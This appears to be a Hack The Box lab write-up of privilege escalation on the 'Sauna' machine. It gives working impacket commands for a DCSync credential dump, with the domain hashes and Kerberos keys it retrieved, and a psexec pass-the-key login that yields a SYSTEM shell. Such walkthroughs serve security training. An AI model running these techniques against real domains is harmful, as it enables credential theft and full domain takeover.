InfoSec LAB

Sauna_Privilege_Escalation

Created: 2 min read

DCSync Attack

As previously enumerated with bloodhound, the svc_loanmgr user has the DCSync privileges over the domain

Now that I have validated the credential of the svc_loanmgr user and, I should be able to perform the DCSync Attack

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ KRB5CCNAME=svc_loanmgr.ccache impacket-secretsdump EGOTISTICAL-BANK.LOCAL/@sauna.egotistical-bank.local -no-pass -k -target-ip $IP -dc-ip $IP         
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
egotistical-bank.local\hsmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
egotistical-bank.local\fsmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
egotistical-bank.local\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
sauna$:1000:aad3b435b51404eeaad3b435b51404ee:5dc91efb42d910e053e11dffa46bf5d6:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
egotistical-bank.local\hsmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
egotistical-bank.local\hsmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
egotistical-bank.local\hsmith:des-cbc-md5:1c73b99168d3f8c7
egotistical-bank.local\fsmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
egotistical-bank.local\fsmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
egotistical-bank.local\fsmith:des-cbc-md5:b50e02ab0d85f76b
egotistical-bank.local\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
egotistical-bank.local\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
egotistical-bank.local\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
sauna$:aes256-cts-hmac-sha1-96:169b40d92b9b50b70712649ec010a4941314a10e61443b9249bc483d94012825
sauna$:aes128-cts-hmac-sha1-96:5a9b17710de61c6181ca21a297276b0e
sauna$:des-cbc-md5:ef6d38977fea32d9
[*] Cleaning up...

Domain Level Compromise

Shelldrop

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-psexec egotistical-bank.local/administrator@sauna.egotistical-bank.local -aesKey 42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[-] CCache file is not found. Skipping...
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file oRHGikoC.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service ZVjP on 10.10.10.175.....
[*] Starting service ZVjP.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
SAUNA
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::17a
   IPv6 Address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
   Link-local IPv6 Address . . . . . : fe80::64df:5bff:4879:1d8b%7
   IPv4 Address. . . . . . . . . . . : 10.10.10.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
                                       10.10.10.2

System Level Compromise

Interactive Graph View

Backlinks